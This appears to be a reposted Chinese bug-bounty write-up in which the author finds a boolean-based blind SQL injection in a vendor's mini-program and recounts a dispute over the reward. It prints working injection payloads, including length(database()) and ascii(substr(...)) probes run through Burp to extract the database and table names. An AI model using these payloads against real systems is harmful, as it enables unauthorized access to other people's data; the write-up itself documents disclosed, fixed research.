记一次与某src厂商斗智斗勇最终拿到赏金

admin 2023年10月1日20:18:35评论60 views字数 1245阅读4分9秒阅读模式

免责声明

由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。LK安全公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

文中涉及漏洞均以提交至相关漏洞平台,禁止打再次复现主意

注:本文是赏金漏洞挖掘学院一期学员-独爱71师傅写的文章,感谢大家阅读

身为一个菜狗,当然想去src厂商哪里挖掘漏洞,获取赏金得到激励。于是乎,我去补天哪里随便找到一个厂商就开始了我的漏洞挖掘。(注:以下漏洞厂商已修复)

一、信息收集

通过爱企查,查找对方公司的域名,小程序,APP之类的,然后使用360quake,OneForAll,鹰图进行子域名查询等等

记一次与某src厂商斗智斗勇最终拿到赏金

时间太久了,很多图没有截上去,希望大佬勿喷

二、开始漏洞挖掘

在所有web网站进行挑选挖掘后,感觉实在挖不倒(太菜了,没有挖到),于是眼光开始转向新的方向,小程序渗透。至于如何抓包,这里不多讲,网上文章很多。

找找找中,看见一个很新鲜的小程序,于是打开进去,通过burp,看见post请求里面有id,于是测一波看有没有SQL注入

记一次与某src厂商斗智斗勇最终拿到赏金

先进行注入判断, 'and 1=1#

记一次与某src厂商斗智斗勇最终拿到赏金

回显正常

'and 1=2#

记一次与某src厂商斗智斗勇最终拿到赏金

报错了,SQL注入来了啊

可以看出布尔盲注,于是接着构造攻击语句

判断数据库的长度

'and length(database())=8#

记一次与某src厂商斗智斗勇最终拿到赏金

报错,在

'and length(database())=9#

记一次与某src厂商斗智斗勇最终拿到赏金

正常回显,说明数据库名为9位数

获取数据库名,这里我们采用burp爆破模式

Payload:’and ascii(substr(database(),1,1))=§1§#

记一次与某src厂商斗智斗勇最终拿到赏金

通过累加1获得数据库的ascii码值,在进行解码,获得数据库名

db_around

接着获取表名

'and ascii(substr((select table_name from information_schema.tables where
table_schema=database() limit 0,1),1,1))=§9§#

记一次与某src厂商斗智斗勇最终拿到赏金

依次通过累加limit 的1获取到第一个表名

adb_task

后面就不跑了,交洞交洞,拿赏金去

三、挫折出现

漏洞提交后,静等审核

记一次与某src厂商斗智斗勇最终拿到赏金

结果,居然打偏了,泪奔,太想哭了,亏自己兴奋一晚上,后面洞就放哪里不管了

然后转折出现,厂商发布收录域名,最后我一看,漏洞的域名属于收录范围啊,兴致冲冲在跑去交洞

又是兴奋的一晚上,结果

记一次与某src厂商斗智斗勇最终拿到赏金

哭死,加气死,什么魔鬼啊,拒绝,难受死,理由却是

记一次与某src厂商斗智斗勇最终拿到赏金

顶不住,就因为挖到洞,就连夜下资产吗,痛哭

最后转折,偷偷私聊审核,让审核帮我,最终在审核的帮助下,我拿到了赏金

记一次与某src厂商斗智斗勇最终拿到赏金

虽然只有一百块,总比没有强,哭死。这个厂商记小本本,以后少碰

结语:这篇文章呢,想告诉大家我的漏洞挖掘思路,其次呢,就是一些厂商如果赏金不肯给的话,一定要想想办法,看能不能解决,不能就当吃哑巴亏吧,记在自己的小本本上,以后注意一点,最后,希望各位大佬天天爆大洞。

欢迎各位表哥点赞,转发,关注!!!

原文始发于微信公众号(LK安全):记一次与某src厂商斗智斗勇最终拿到赏金

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月1日20:18:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次与某src厂商斗智斗勇最终拿到赏金https://cn-sec.com/archives/2082224.html

发表评论

匿名网友 填写信息